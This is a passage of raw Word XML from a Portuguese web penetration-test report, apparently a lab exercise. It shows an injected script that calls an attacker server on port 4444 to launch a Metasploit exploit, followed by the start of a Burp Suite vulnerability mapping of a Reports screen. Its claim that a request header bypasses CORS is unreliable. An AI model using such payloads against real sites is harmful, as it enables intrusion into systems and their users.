      </w:pPr>
      <w:r w:rsidRPr="008A79EE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>r.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="505050"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="E1E7FF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>withCredentials</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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 xml:space="preserve"> = true;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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>.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00654DEF" w:rsidRDefault="008C6DC7" w:rsidP="008719F1">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008719F1" w:rsidRPr="00654DEF">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00E77F75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b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Resultado</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Passou no teste. O comando </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">“withCredentials” </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> encontra-se depreciado e a conexão não ocorreu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75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E77F75" w:rsidRDefault="00E77F75" w:rsidP="008C6DC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="649605"/>
            <wp:effectExtent l="0" t="0" r="0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1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8719F1" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 32</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:t xml:space="preserve">Console do navegador indicando a </w:t>
      </w:r>
      <w:r w:rsidR="00751591">
        <w:t>depreciação</w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:t xml:space="preserve"> do atributo </w:t>
      </w:r>
      <w:r w:rsidR="008719F1">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>“withCredencials”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Tentativa 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008719F1" w:rsidRDefault="008719F1" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Para burlar o filtro CORS, deve ser adicionado ao cabeçalho da requisição uma instrução que simule uma assinatura válida para o navegador. Para esse fim, foi utilizado a instrução “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">setRequestHeader” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para adicionar as credenciais maliciosas ao cabeçalho.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00FF400C" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Comando utilizado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7"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rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE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 xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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 xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE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>r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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>,’</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="1155CC"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:u w:val="single"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://IP_do_servidor:4444’,false</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE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>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="008A79EE" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A79EE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>r.</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="303336"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>setRequestHeader(“</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="353528"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFAF6"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin</w:t>
      </w:r>
      <w:r w:rsidRPr="008A79EE">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="303336"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”,”*”);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="220"/>
        <w:ind w:left="2124"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r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</w:rPr>
        <w:t>.send();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:ind w:left="2124"/>
      </w:pPr>
      <w:r>
        <w:t>&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6A737C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EFF0F1"/>
        </w:rPr>
        <w:t>script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/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Resultado: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Conforme a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> figura</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> 32</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 33</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> requisição foi</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> bem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>sucedida e o Metasploit conseguiu</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF400C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> iniciar o exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="00FF400C" w:rsidRDefault="00751591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spacing w:after="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="1994535"/>
            <wp:effectExtent l="0" t="0" r="0" b="571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32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FF400C" w:rsidRDefault="009A2041" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 33</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00E52417">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Console do navegador indicando a conexão.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="00E77F75"/>
    <w:p w:rsidR="00E77F75" w:rsidRDefault="00E77F75" w:rsidP="00E77F75">
      <w:r>
        <w:t xml:space="preserve">                             </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3600450" cy="1323975"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525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3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751591" w:rsidRDefault="009A2041" w:rsidP="00751591">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Figura 34</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00FF400C">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008719F1">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Exploit inciado com sucesso.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85" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5.2</w:t>
      </w:r>
      <w:r w:rsidRPr="009A7448">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mapeamento de vulnerabilidades – Tela Relatórios</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="009A7448" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="285" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Tarefa realizada dia 24/05/16</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>Duração: 15 minutos.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="1416" w:firstLine="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Objetivo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="2124"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00015DE3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Utilizar o Burp Suite para descobrir as vulnerabilidades existentes na tela Relatório e indicar as possíveis técnicas que devem ser utilizadas </w:t>
      </w:r>
      <w:r w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para explorar as vulnerabilidades encontradas.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:pStyle w:val="PargrafodaLista"/>
        <w:spacing w:after="0"/>
        <w:ind w:left="2136"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00751591">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>Resultados obtidos no momento de gerar um relatório dos dados cadastrados no sistema:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00015DE3" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77F75" w:rsidRPr="003E38DF" w:rsidRDefault="00E77F75" w:rsidP="00E77F75">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">       </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="pt-BR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5400040" cy="3760470"/>
            <wp:effectExtent l="0" t="0" r="0" b="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34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Default="009A2041" w:rsidP="008719F1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35</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="008719F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>- Burp Suite utilizado para captura de parâmetros no cabeçalho de uma requisição HTTP na tela Relatório.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRPr="008719F1" w:rsidRDefault="00751591" w:rsidP="008719F1">
